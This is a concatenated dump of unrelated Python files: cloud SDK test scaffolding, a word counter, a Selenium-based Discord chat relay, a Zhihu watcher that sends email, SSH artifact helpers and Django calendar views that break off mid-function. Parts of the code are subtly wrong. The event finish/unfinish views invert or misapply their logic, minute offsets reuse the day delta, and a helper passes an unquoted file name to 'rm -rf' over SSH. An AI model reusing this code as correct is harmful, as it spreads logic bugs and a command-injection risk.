name=api_adapter.ProjectLocationCluster(self.PROJECT_ID,\n self.ZONE,\n cluster_name),\n maintenancePolicy=policy),\n response=response)\n\n def ExpectGetServerConfig(self, location, exception=None):\n if exception:\n response = None\n else:\n response = self.messages.ServerConfig(\n buildClientInfo='changelist 12345', defaultClusterVersion='1.2.3',\n validMasterVersions=['1.3.2'])\n self.mocked_client.projects_locations.GetServerConfig.Expect(\n self.messages.ContainerProjectsLocationsGetServerConfigRequest(\n name=api_adapter.ProjectLocation(self.PROJECT_ID, location)),\n response=response,\n exception=exception)\n\n\nclass BetaTestBase(GATestBase):\n \"\"\"Mixin class for testing v1beta1.\"\"\"\n API_VERSION = 'v1beta1'\n\n # Sort the scopes to assert equality of the lists\n _DEFAULT_SCOPES = sorted([\n 'https://www.googleapis.com/auth/devstorage.read_only',\n 'https://www.googleapis.com/auth/logging.write',\n 'https://www.googleapis.com/auth/monitoring',\n 'https://www.googleapis.com/auth/service.management.readonly',\n 'https://www.googleapis.com/auth/servicecontrol',\n 'https://www.googleapis.com/auth/trace.append',\n ])\n\n def SetUp(self):\n self.track = calliope_base.ReleaseTrack.BETA\n\n def _MakeCluster(self, **kwargs):\n cluster = GATestBase._MakeCluster(self, **kwargs)\n cluster.auditConfig = kwargs.get('auditConfig')\n cluster.binaryAuthorization = kwargs.get('binaryAuthorization')\n cluster.enableTpu = kwargs.get('enableTpu')\n cluster.autoscaling = kwargs.get('clusterAutoscaling')\n cluster.verticalPodAutoscaling = kwargs.get('verticalPodAutoscaling')\n return cluster\n\n def _MakeNodePool(self, **kwargs):\n node_pool = GATestBase._MakeNodePool(self, **kwargs)\n node_pool.config.workloadMetadataConfig = kwargs.get(\n 'workloadMetadataConfig')\n return node_pool\n\n def _MakeIPAllocationPolicy(self, **kwargs):\n policy = GATestBase._MakeIPAllocationPolicy(self, **kwargs)\n if 'allowRouteOverlap' in kwargs:\n policy.allowRouteOverlap = kwargs.get('allowRouteOverlap')\n return policy\n\n\nclass AlphaTestBase(BetaTestBase):\n \"\"\"Mixin class for testing v1alpha1.\"\"\"\n API_VERSION = 'v1alpha1'\n\n def SetUp(self):\n self.track = calliope_base.ReleaseTrack.ALPHA\n\n def _MakeCluster(self, **kwargs):\n cluster = super(AlphaTestBase, self)._MakeCluster(**kwargs)\n cluster.enableTpu = kwargs.get('enableTpu')\n cluster.defaultMaxPodsConstraint = kwargs.get('defaultMaxPodsConstraint')\n return cluster\n\n def _MakeNodePool(self, **kwargs):\n node_pool = BetaTestBase._MakeNodePool(self, **kwargs)\n if kwargs.get('localSsdVolumeConfigs') is not None:\n node_pool.config.localSsdVolumeConfigs = kwargs.get(\n 'localSsdVolumeConfigs')\n node_pool.maxPodsConstraint = kwargs.get('maxPodsConstraint')\n node_pool.config.sandboxConfig = kwargs.get('sandboxConfig')\n return node_pool\n\n def _MakeUsableSubnet(self, **kwargs):\n # cluster.auditConfig = kwargs.get('auditConfig')\n # Construct the default pool, if we don't have any passed in. 
We\n # can't know all the possible permutations, so any tests involving\n # multiple nodepools must construct them prior to _MakeCluster.\n # if kwargs.get('nodePools') is None:\n # pool = self._MakeDefaultNodePool(**kwargs)\n # kwargs['nodePools'] = [pool]\n # kwargs['instanceGroupUrls'] = pool.instanceGroupUrls\n network = resources.REGISTRY.Create('compute.networks',\n project=self.PROJECT_ID,\n network=kwargs.get('network'))\n subnetwork = resources.REGISTRY.Create('compute.subnetworks',\n project=self.PROJECT_ID,\n region=self.REGION,\n subnetwork=kwargs.get('subnetwork'))\n return self.messages.UsableSubnetwork(\n subnetwork=subnetwork.RelativeName(),\n network=network.RelativeName(),\n ipCidrRange=kwargs.get('ipCidrRange')\n )\n\n def _MakeListUsableSubnetworksResponse(self, subnets):\n return self.messages.ListUsableSubnetworksResponse(subnetworks=subnets)\n\n def _ExpectListUsableSubnets(self, response, exception=None):\n req = self.messages.ContainerProjectsAggregatedUsableSubnetworksListRequest(\n parent=self.PROJECT_REF.RelativeName(),\n pageSize=500,\n filter='')\n if exception:\n response = None\n self.mocked_client.projects_aggregated_usableSubnetworks.List.Expect(\n req, response=response, exception=exception)\n\n\nclass IntegrationTestBase(\n e2e_base.WithServiceAuth,\n sdk_test_base.WithOutputCapture):\n \"\"\"Base class for container integration tests.\"\"\"\n\n REGION = 'us-central1'\n ZONE = 'us-central1-f'\n\n def TearDown(self):\n if not hasattr(self, 'cluster_name'):\n return\n try:\n log.status.Print('Attempting to cleaning up %s', self.cluster_name)\n # Make cluster deletion asynchronized until gcloud can allow a timeout\n # longer than 20 minutes.\n self.Run('container clusters delete {0} --zone={1} --async -q'\n .format(self.cluster_name, self.ZONE))\n except core_exceptions.Error as error:\n log.status.Print('Failed to delete %s:\\n%s', self.cluster_name, error)\n try:\n log.status.Print('Attempting to cleaning up %s', self.cluster_name)\n # Make cluster deletion asynchronized until gcloud can allow a timeout\n # longer than 20 minutes.\n self.Run('container clusters delete {0} --region={1} --async -q'\n .format(self.cluster_name, self.REGION))\n except core_exceptions.Error as error:\n log.status.Print('Failed to delete %s:\\n%s', self.cluster_name, error)\n\n def _GetLocationFlag(self, location):\n \"\"\"Produce location flag for a given location.\"\"\"\n if location == self.ZONE:\n return '--zone={0}'.format(self.ZONE)\n elif location == self.REGION:\n return '--region={0}'.format(self.REGION)\n raise ValueError('Broken test - location unknown to the test util.')\n\n def CleanupLeakedClusters(self, location, track):\n \"\"\"Cleanup leaked clusters that are older than 3 hours.\"\"\"\n # TODO(b/109872728): improve how we handle leaked clusters.\n # Creating a cluster may timeout in the test, but the creation may\n # eventually succeed. This causes the cluster leaked. 
Too many leaked\n # clusters will prevent future cluster creation due to lack of quota.\n # When there are no leaked clusters, that cleanup operations are just NOOP.\n # We cleanup leaked clusters that are older than 3 hours.\n leaked_cluster_min_age = datetime.timedelta(hours=3)\n output = self.Run(\n 'container clusters list {0}'.format(self._GetLocationFlag(location)),\n track=track)\n jsonoutput = encoding.MessageToJson(output)\n clusters = json.loads(jsonoutput)\n for cluster in clusters:\n createtime = cluster['createTime']\n dt1 = parser.parse(createtime)\n dt2 = dt1 + leaked_cluster_min_age\n dt3 = datetime.datetime.utcnow().replace(tzinfo=tz.tzutc()) # pylint: disable=g-tzinfo-replace\n if dt2 < dt3:\n self.Run(\n 'container clusters delete {0} {1} -q --async'.format(\n cluster['name'], self._GetLocationFlag(location)),\n track=track)\n log.status.Print('Deleting a leaked cluster: %s', cluster['name'])\n\n\nclass ClustersTestBase(UnitTestBase):\n \"\"\"Base class for clusters command tests.\"\"\"\n\n def SetUp(self):\n self.clusters_command_base = self.COMMAND_BASE + ' clusters --zone {0}'\n self.regional_clusters_command_base = (self.COMMAND_BASE +\n ' clusters --region {0}')\n kubeconfig_path = kconfig.Kubeconfig.DefaultPath()\n if os.path.exists(kubeconfig_path):\n os.unlink(kubeconfig_path)\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n self._PatchSDKBinPath()\n\n\nclass NodePoolsTestBase(UnitTestBase):\n \"\"\"Base class for node-pools command tests.\"\"\"\n\n def SetUp(self):\n self.node_pools_command_base = self.COMMAND_BASE + ' node-pools --zone {0}'\n self.regional_node_pools_command_base = (self.COMMAND_BASE +\n ' node-pools --region {0}')\n kubeconfig_path = kconfig.Kubeconfig.DefaultPath()\n if os.path.exists(kubeconfig_path):\n os.unlink(kubeconfig_path)\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n\n def HttpError(self):\n return http_error.MakeHttpError(\n 400, 'your request is bad and you should feel bad.',\n url='https://fake-url.io')\n\n\nclass OperationsTestBase(UnitTestBase):\n \"\"\"Base class for operations command tests.\"\"\"\n\n def SetUp(self):\n self.operations_command_base = self.COMMAND_BASE + ' operations'\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n\n\nclass GetServerConfigTestBase(UnitTestBase):\n \"\"\"Base class for get-server-config command tests.\"\"\"\n\n def SetUp(self):\n self.get_server_config_command_base = (self.COMMAND_BASE +\n ' get-server-config')\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n\n\nclass SubnetsTestBase(UnitTestBase):\n \"\"\"Base class for subnets command tests.\"\"\"\n\n def SetUp(self):\n self.subnets_command_base = self.COMMAND_BASE + ' subnets'\n self.msgs = core_apis.GetMessagesModule('container', self.API_VERSION)\n","sub_path":"google-cloud-sdk/lib/tests/lib/surface/container/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":44946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"320089477","text":"import re\n\ndef word_count(phrase):\n\t\"\"\" \n\tGiven a phrase, counts the occurrences of each word in that phrase.\n\t\"\"\"\n\n\tphrase = re.sub('[^0-9a-zA-Z]+', ' ', phrase.lower())\n\tword_list = phrase.split()\n\tword_dict = dict([ (word, word_list.count(word)) for word in word_list ])\n\t\n\treturn 
word_dict\n","sub_path":"exercism/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333542407","text":"from typing import Literal, Optional\r\nimport json\r\nimport logging\r\nimport asyncio\r\nimport hashlib\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.remote.command import Command\r\n\r\nimport discord\r\nfrom redbot.core import commands\r\nfrom redbot.core.bot import Red\r\nfrom redbot.core.config import Config\r\n\r\nRequestType = Literal[\"discord_deleted_user\", \"owner\", \"user\", \"user_strict\"]\r\nlog = logging.getLogger(\"red.eunsah-cogs.twBNSchat\")\r\n\r\n\r\nclass twBNSchat(commands.Cog):\r\n \"\"\"\r\n Fetch Taiwan Blade&Soul f8 chat\r\n ---\r\n For any issues about this cog\r\n Contact me via ba#0373\r\n \"\"\"\r\n\r\n def __init__(self, bot: Red) -> None:\r\n self.bot = bot\r\n self._sync = False\r\n self._enabled = True\r\n # self._status = ('-', '-')\r\n self.driver = None\r\n self._cached_messages = []\r\n\r\n self.config = Config.get_conf(\r\n self,\r\n identifier=164900704526401545021,\r\n force_registration=True,\r\n )\r\n\r\n default_guild = {\r\n \"channel\": None,\r\n \"toggle\": False,\r\n }\r\n\r\n default_global = {\r\n \"accountA\": None,\r\n \"accountB\": None,\r\n # \"timestamp\" : None,\r\n # \"url\": \"\",\r\n }\r\n\r\n self.config.register_guild(**default_guild)\r\n self.config.register_global(**default_global)\r\n\r\n # bot.loop.create_task(self.initialize())\r\n\r\n async def red_delete_data_for_user(\r\n self, *, requester: RequestType, user_id: int\r\n ) -> None:\r\n super().red_delete_data_for_user(requester=requester, user_id=user_id)\r\n\r\n def cog_unload(self):\r\n log.debug(\"Unloading twBNSchat...\")\r\n self._enabled = False\r\n if self._sync:\r\n self._sync.cancel()\r\n self.driver.quit()\r\n log.debug(\"Stopped selenium.\")\r\n log.debug(\"twBNSchat unloaded.\")\r\n\r\n async def initialize(self):\r\n await self.bot.wait_until_red_ready()\r\n\r\n driver_options = webdriver.ChromeOptions()\r\n driver_options.add_argument(\"--mute-audio\")\r\n driver_options.add_experimental_option(\"excludeSwitches\", [\"enable-logging\"])\r\n driver_options.add_argument(\"--disable-extensions\")\r\n driver_options.add_argument(\"--disable-gpu\")\r\n driver_options.add_argument(\"--disable-dev-shm-usage\")\r\n driver_options.add_argument(\"--no-sandbox\")\r\n driver_options.headless = True\r\n\r\n driver_caps = webdriver.DesiredCapabilities.CHROME.copy()\r\n driver_caps[\"goog:loggingPrefs\"] = {\"performance\": \"ALL\"}\r\n\r\n log.debug(\"Initializing selenium...\")\r\n\r\n try:\r\n self.driver = webdriver.Chrome(\r\n options=driver_options,\r\n desired_capabilities=driver_caps,\r\n executable_path=r\"/home/qenu_dev/bin/chromedriver\",\r\n )\r\n except Exception as err:\r\n await self.test_send(f\"Webdriver Error: {err}\")\r\n\r\n try:\r\n self.driver.get(\r\n \"https://a90ur5.github.io/twBNS_F8ChattingChannel/web/index.html\"\r\n )\r\n except Exception as err:\r\n await self.test_send(f\"Driver get Error: {err}\")\r\n \r\n if self.driver:\r\n self._sync = self.bot.loop.create_task(self.start_fetch())\r\n\r\n async def start_fetch(self):\r\n # await self.test_send(\"start\")\r\n await self.bot.wait_until_red_ready()\r\n while self._enabled:\r\n # await self.test_send(\"twbnschat requesting...\")\r\n await self.websocket_fetch()\r\n await asyncio.sleep(6.4)\r\n\r\n async def websocket_fetch(self):\r\n 
announce_queue = []\r\n log = self.driver.get_log(\"performance\")\r\n\r\n if 10 < len(log) or len(log) <= 0:\r\n return\r\n\r\n output = False\r\n\r\n for wsData in log:\r\n\r\n try:\r\n wsJson = json.loads(wsData[\"message\"])\r\n if (\r\n wsJson[\"message\"][\"method\"] == \"Network.webSocketFrameReceived\"\r\n and wsJson[\"message\"][\"params\"][\"response\"][\"payloadData\"][0] == \"4\"\r\n ):\r\n wsParsed = json.loads(\r\n wsJson[\"message\"][\"params\"][\"response\"][\"payloadData\"][2:]\r\n )\r\n # await self.test_send(f\"processed log: {wsParsed}\")\r\n if wsParsed[0] == \"getStatus\":\r\n # await self.test_send(\"got status\")\r\n await self.config.accountA.set(wsParsed[1][\"accountA\"])\r\n await self.config.accountB.set(wsParsed[1][\"accountB\"])\r\n return\r\n if wsParsed[0] == \"getInquiry\":\r\n # await self.test_send(\"got inquiry\")\r\n announce_queue.append(wsParsed[1])\r\n output = True\r\n except Exception:\r\n pass\r\n if output:\r\n await self.text_announce(announce_queue)\r\n\r\n async def channel_announce(self, data: dict):\r\n\r\n config = await self.config.all_guilds()\r\n\r\n guild_queue = [\r\n guild_id for guild_id in config if config[guild_id][\"toggle\"] is True\r\n ]\r\n if not len(guild_queue):\r\n return\r\n\r\n if self.in_cached(data[\"player\"] + \"|\" + data[\"msg\"]):\r\n return\r\n\r\n embed = discord.Embed(\r\n title=data[\"player\"],\r\n description=data[\"msg\"],\r\n color=self.string2discordColor(data[\"player\"]),\r\n )\r\n embed.set_footer(text=data[\"time\"])\r\n\r\n for guild_id in guild_queue:\r\n try:\r\n guild = self.bot.get_guild(guild_id)\r\n channel = guild.get_channel(int(config[guild_id][\"channel\"]))\r\n await channel.send(embed=embed)\r\n except Exception:\r\n pass\r\n\r\n async def text_announce(self, data_l: list):\r\n\r\n config = await self.config.all_guilds()\r\n\r\n guild_queue = [\r\n guild_id for guild_id in config if config[guild_id][\"toggle\"] is True\r\n ]\r\n if not len(guild_queue):\r\n return\r\n\r\n data_l = [\r\n data\r\n for data in data_l\r\n if not self.in_cached(data[\"player\"] + \"|\" + data[\"msg\"])\r\n ]\r\n\r\n joinee = [\r\n f'`{data[\"time\"]}` **{data[\"player\"]}** `{data[\"msg\"]}`'\r\n for data in data_l\r\n ]\r\n if len(joinee):\r\n for guild_id in guild_queue:\r\n try:\r\n guild = self.bot.get_guild(guild_id)\r\n channel = guild.get_channel(int(config[guild_id][\"channel\"]))\r\n await channel.send(\"\\n\".join(joinee))\r\n except Exception:\r\n pass\r\n\r\n def string2discordColor(self, text: str) -> str:\r\n hashed = str(\r\n int(hashlib.sha1(text.encode(\"utf-8\")).hexdigest(), 16) % (10 ** 9)\r\n )\r\n r = int(hashed[:3]) % 255\r\n g = int(hashed[3:6]) % 255\r\n b = int(hashed[6:]) % 255\r\n\r\n return discord.Color.from_rgb(r, g, b)\r\n\r\n def in_cached(self, text: str) -> bool:\r\n if text in self._cached_messages:\r\n return True\r\n else:\r\n self._cached_messages.append(text)\r\n if len(self._cached_messages) >= 30:\r\n self._cached_messages = self._cached_messages[\r\n (30 - len(self._cached_messages)) :\r\n ]\r\n return False\r\n\r\n @commands.group(name=\"twbnschat\")\r\n @commands.admin_or_permissions(manage_guild=True)\r\n async def twbnschat(self, ctx):\r\n \"\"\"settings for twbnschat\"\"\"\r\n await ctx.trigger_typing()\r\n if ctx.invoked_subcommand is None:\r\n guild: discord.Guild = ctx.guild\r\n config = await self.config.guild(guild).all()\r\n\r\n embed = discord.Embed(\r\n color=await ctx.embed_color(), title=\"TwB&S F8 chat settings\"\r\n )\r\n 
embed.add_field(name=\"Enabled\", value=config[\"toggle\"])\r\n\r\n channel = (\r\n ctx.guild.get_channel(config[\"channel\"]).mention\r\n if ctx.guild.get_channel(config[\"channel\"])\r\n else \"None\"\r\n )\r\n\r\n embed.add_field(\r\n name=\"Channel\",\r\n value=channel,\r\n )\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @twbnschat.command(name=\"channel\")\r\n async def channel(\r\n self, ctx: commands.Context, channel: Optional[discord.TextChannel] = None\r\n ):\r\n \"\"\"sets the channel to receive driver updates\r\n\r\n Usage: [p]twbnschat channel <#channl_mention>\r\n leave blank to unset\r\n \"\"\"\r\n await self.config.guild(ctx.guild).channel.set(\r\n None if channel is None else channel.id\r\n )\r\n if channel is None:\r\n await self.enabled(ctx, False)\r\n await ctx.send(\r\n f\"Channel for twbnschat has been {'unset' if channel is None else f'set at {channel.mention}'}.\"\r\n )\r\n\r\n @twbnschat.command(name=\"enabled\")\r\n async def enabled(self, ctx: commands.Context, on_off: bool):\r\n \"\"\"enables the channel for receiving\r\n\r\n Usage: [p]twbnschat enabled [on_off]\r\n \"\"\"\r\n guild: discord.Guild = ctx.guild\r\n\r\n await self.config.guild(guild).toggle.set(on_off)\r\n\r\n if on_off and await self.config.guild(guild).channel() == None:\r\n await self.config.guild(guild).channel.set(ctx.channel.id)\r\n await ctx.send(\r\n f\"Channel for twbnschat has been set to {ctx.channel.mention}.\"\r\n )\r\n\r\n await ctx.send(f\"Twbnschat has been {'enabled' if on_off else f'disabled'}.\")\r\n\r\n @twbnschat.command(name=\"alive\")\r\n @commands.is_owner()\r\n async def alive(self, ctx: commands.Context):\r\n \"\"\"(debug) function to check driver status\"\"\"\r\n try:\r\n self.driver.execute(Command.STATUS)\r\n await ctx.send(\"Driver is alive.\")\r\n except Exception as err:\r\n await ctx.send(f\"Driver is dead. 
Reason {err}\")\r\n\r\n @twbnschat.command(name=\"refresh\")\r\n @commands.is_owner()\r\n async def refresh(self, ctx: commands.Context):\r\n \"\"\"refreshes selenium connection\"\"\"\r\n await self.bot.wait_until_red_ready()\r\n await ctx.send(\"Stopping twbnschat...\")\r\n await self.stop(ctx)\r\n await asyncio.sleep(5)\r\n await self.start(ctx)\r\n await ctx.send(\"Done.\")\r\n\r\n @twbnschat.command(name=\"stop\")\r\n @commands.is_owner()\r\n async def stop(self, ctx: commands.Context):\r\n \"\"\"stops selenium and executed loop\"\"\"\r\n self._enabled = False\r\n if self._sync:\r\n self._sync.cancel()\r\n try:\r\n self.driver.delete_all_cookies()\r\n self.driver.close()\r\n self.driver.quit()\r\n except Exception:\r\n pass\r\n await ctx.send(content=\"Twbnschat stopped.\")\r\n\r\n @twbnschat.command(name=\"start\")\r\n @commands.is_owner()\r\n async def start(self, ctx: commands.Context):\r\n \"\"\"initialize selenium for chat fetching\"\"\"\r\n # await self.config\r\n if self.driver is None:\r\n await ctx.send(\"Initilizing selenium driver...\")\r\n self.bot.loop.create_task(self.initialize())\r\n else:\r\n await ctx.send(f\"Driver is already running\")\r\n await asyncio.sleep(4)\r\n await self.alive(ctx)\r\n\r\n @twbnschat.command(name=\"status\")\r\n async def status(self, ctx: commands.Context):\r\n \"\"\"shows the last obtained status from site\"\"\"\r\n emb = discord.Embed(description=\"Last Reported\")\r\n emb.add_field(name=\"accountA\", value=await self.config.accountA())\r\n emb.add_field(name=\"accountB\", value=await self.config.accountB())\r\n\r\n await ctx.send(embed=emb)\r\n\r\n async def test_send(self, text: str):\r\n g = self.bot.get_guild(247820107760402434)\r\n c = g.get_channel(879630016856596521)\r\n await c.send(content=text)\r\n","sub_path":"twbnschat/twbnschat.py","file_name":"twbnschat.py","file_ext":"py","file_size_in_byte":12077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420925055","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nimport time\nimport datetime\ndef getLatestMessage(browser):\n try:\n element = WebDriverWait(browser,10).until(EC.presence_of_element_located((By.CSS_SELECTOR,'.ListShortcut')))\n except:\n print('ERROR')\n messages = browser.find_element_by_css_selector('.ListShortcut').find_elements_by_class_name('List-item')\n message = messages[0]\n t = message.find_element_by_class_name('ActivityItem-meta').find_elements_by_tag_name('span')[1].text\n option = message.find_element_by_class_name('ActivityItem-meta').find_elements_by_tag_name('span')[0].text\n title = message.find_element_by_class_name('ContentItem-title').text\n print(t)\n print(option+\":\"+title)\n content = option+\":\"+title\n return t,content\n\ndef sendMail(content):\n mail_host = 'smtp.xxx.com'\n mail_user = 'xxx@xxx.com'\n mail_pass = '**********'\n\n sender = 'xxx@xxx.com'\n receivers = ['xxx@xxx.com']\n message = MIMEText(content,'plain','utf-8')\n\n message['From'] = sender\n message['To'] = receivers[0]\n subject = '知乎动态更新!'\n message['Subject'] = Header(subject,'utf-8')\n try:\n smtpObj = smtplib.SMTP()\n smtpObj.connect(mail_host,25)\n smtpObj.login(mail_user,mail_pass)\n smtpObj.sendmail(sender,receivers,message.as_string())\n print('邮件发送成功')\n except Exception 
as E:\n print(E)\nif __name__ == '__main__':\n uid = 'xxx'\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n # options.add_argument('--no-sandbox')\n # options.add_argument('--disable-gpu')\n browser = webdriver.Chrome(options=options)\n browser.get(\"https://www.zhihu.com/people/\"+uid)\n history = ''\n while(True):\n t, content = getLatestMessage(browser)\n if content != history:\n sendMail(t+' '+content)\n history = content\n now = datetime.datetime.now().hour\n if(now < 8):\n time.sleep((8-now)*60*60)\n else:\n time.sleep(2*60*60)\n browser.refresh()\n\n","sub_path":"notice.py","file_name":"notice.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"388593271","text":"#! /usr/bin/env python3\n\n\"\"\"\nThis file contains utility functions for scripts responsible for pushing\nand pulling build artifacts.\n\"\"\"\n__author__ = \"Jakub Kudzia\"\n__copyright__ = \"Copyright (C) 2016 ACK CYFRONET AGH\"\n__license__ = \"This software is released under the MIT license cited in \" \\\n \"LICENSE.txt\"\n\nimport os\nimport time\nimport paramiko\n\n\nARTIFACTS_DIR = 'artifacts'\nARTIFACTS_EXT = '.tar.gz'\nPARTIAL_EXT = '.partial'\nDEVELOP_BRANCH = 'develop'\n\n\ndef artifact_path(plan: str, branch: str) -> str:\n \"\"\"\n Returns path to artifact for specific plan and branch. Path is relative\n to user's home directory on repository machine.\n :param plan: name of current bamboo plan\n :param branch: name of current git branch\n \"\"\"\n return os.path.join(ARTIFACTS_DIR, plan, branch + ARTIFACTS_EXT)\n\n\ndef delete_file(ssh: paramiko.SSHClient, file_name: str) -> None:\n \"\"\"\n Delete file named file_name via ssh.\n :param ssh: sshclient with opened connection\n :param file_name: name of file to be unlocked\n \"\"\"\n\n ssh.exec_command(\"rm -rf {}\".format(file_name))\n\n\ndef partial_extension() -> str:\n return \"{partial}.{timestamp}\".format(\n partial=PARTIAL_EXT,\n timestamp=time.time()\n )\n","sub_path":"artifacts/artifact_utils.py","file_name":"artifact_utils.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428432053","text":"from django.shortcuts import render, redirect, render_to_response, RequestContext, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django import http\nfrom django.http import HttpResponse\nfrom django.utils import timezone\nimport json\nimport datetime\n\nimport dateutil.parser\nfrom utils.func import *\n\nfrom .models import Event\nfrom core.models import StudyGroup\n\n\n########################\n# Calendar\n########################\n\n@login_required\ndef view_calendar(request, study_group_id=None):\n #form = EventForm(data=request.POST or None, user=request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n template = 'event/view_calendar.html'\n\n return render(request, template, {'study_group': study_group, })\n\n########################\n# Event\n########################\n\n@login_required\ndef create_event(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n title = request.POST.get('title')\n start_timestamp = request.POST.get('start')\n end_timestamp = request.POST.get('end')\n 
allDay = request.POST.get('allDay')\n assigned_list = request.POST.get('assigned_list')\n\n assigned_list = assigned_list.split(',')\n\n if allDay is 'true':\n allDay = True\n else:\n allDay = False\n\n start = dateutil.parser.parse(start_timestamp)\n end = dateutil.parser.parse(end_timestamp)\n\n event = Event(name=title, details='', start=start, end=end, creator=current_student, study_group=study_group)\n event.save()\n\n for email in assigned_list:\n student = Student.objects.get(user__username=email)\n event.assigned_to.add(student)\n\n event.save()\n\n study_group.event_set.add(event)\n\n #movie_json = {}\n #html = t.render(Context(context))\n\n #movie_json['source'] = html\n\n #results = []\n #results.append(movie_json)\n\n #data = json.dumps(results)\n data = \"success\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n@login_required\ndef create_event_view(request):\n form = EventForm(data=request.POST or None, user=request.user)\n template = 'core/create_event.html'\n\n return render(request, template, {'form': form, })\n\n########################\n# Finish event\n########################\n\n@login_required\ndef finish_event_as_json(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n id = request.POST.get('id')\n\n event = Event.objects.get(id=id)\n\n if current_student in event.finished_student.all():\n event.finished_student.add(current_student)\n data = \"success\"\n else:\n data = \"fail: already finished\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n@login_required\ndef unfinish_event_as_json(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n id = request.POST.get('id')\n\n event = Event.objects.get(id=id)\n\n if current_student in event.finished_student.all():\n event.finished_student.add(current_student)\n data = \"success\"\n else:\n data = \"fail: not finished\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n########################\n# Finish event\n########################\n\n@login_required\ndef finish_event(request, study_group_id=None, event_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n event = Event.objects.get(id=event_id)\n\n if current_student not in event.finished_student.all():\n event.finished_student.add(current_student)\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n@login_required\ndef unfinish_event(request, study_group_id=None, event_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n event = Event.objects.get(id=event_id)\n\n if current_student in event.finished_student.all():\n event.finished_student.remove(current_student)\n\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n########################\n# Edit event\n########################\n\n@login_required\ndef edit_event(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n #study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == 
\"POST\":\n id = request.POST.get('id')\n dayDelta = int(request.POST.get('dayDelta'))\n minuteDelta = int(request.POST.get('minuteDelta'))\n\n event = Event.objects.get(id=id)\n\n event.start = event.start + datetime.timedelta(days=dayDelta) \\\n + datetime.timedelta(minutes=dayDelta)\n event.end = event.end + datetime.timedelta(days=dayDelta) \\\n + datetime.timedelta(minutes=dayDelta)\n\n event.save()\n\n data = \"success\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n########################\n# Complete event\n########################\n\n@login_required\ndef complete_event(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n id = request.POST.get('id')\n dayDelta = int(request.POST.get('dayDelta'))\n minuteDelta = int(request.POST.get('minuteDelta'))\n\n event = Event.objects.get(id=id)\n\n event.start = event.start + datetime.timedelta(days=dayDelta) \\\n + datetime.timedelta(minutes=dayDelta)\n event.end = event.end + datetime.timedelta(days=dayDelta) \\\n + datetime.timedelta(minutes=dayDelta)\n\n event.save()\n\n data = \"success\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n########################\n# Delete event\n########################\n\n@login_required\ndef delete_event(request, study_group_id=None):\n current_student = get_student_from_user(request.user)\n #study_group = StudyGroup.objects.get(unique_id=study_group_id)\n\n if request.is_ajax() and request.method == \"POST\":\n id = request.POST.get('id')\n\n event = Event.objects.get(id=id)\n event.delete()\n\n data = \"success\"\n else:\n data = \"fail\"\n\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n########################\n# Calendar\n########################\n\n@login_required\ndef view_calendar(request, study_group_id=None):\n #form = EventForm(data=request.POST or None, user=request.user)\n template = 'core/view_calendar.html'\n\n return render(request, template, {})\n\n@login_required\ndef get_event_as_json(request, study_group_id=None): \n current_student = get_student_from_user(request.user)\n\n if study_group_id == '0':\n events = current_student.assigned_to.all()\n else:\n study_group = StudyGroup.objects.get(unique_id=study_group_id)\n events = study_group.event_set.all()\n\n event_list = []\n\n for event in events: \n event_start = event.start.astimezone(timezone.get_default_timezone()) \n event_end = event.end.astimezone(timezone.get_default_timezone())\n\n if event_start.hour == 0 and event_start.minute == 0: \n Allday = True \n else: \n Allday = False\n\n student_list = []\n for student in event.assigned_to.all():\n student_list.append(student.user.username)\n\n student_list = ','.join(student_list)\n\n if current_student in event.finished_student.all():\n finished = True\n else:\n finished = False\n\n event_list.append ({ \n 'id': event.id , \n 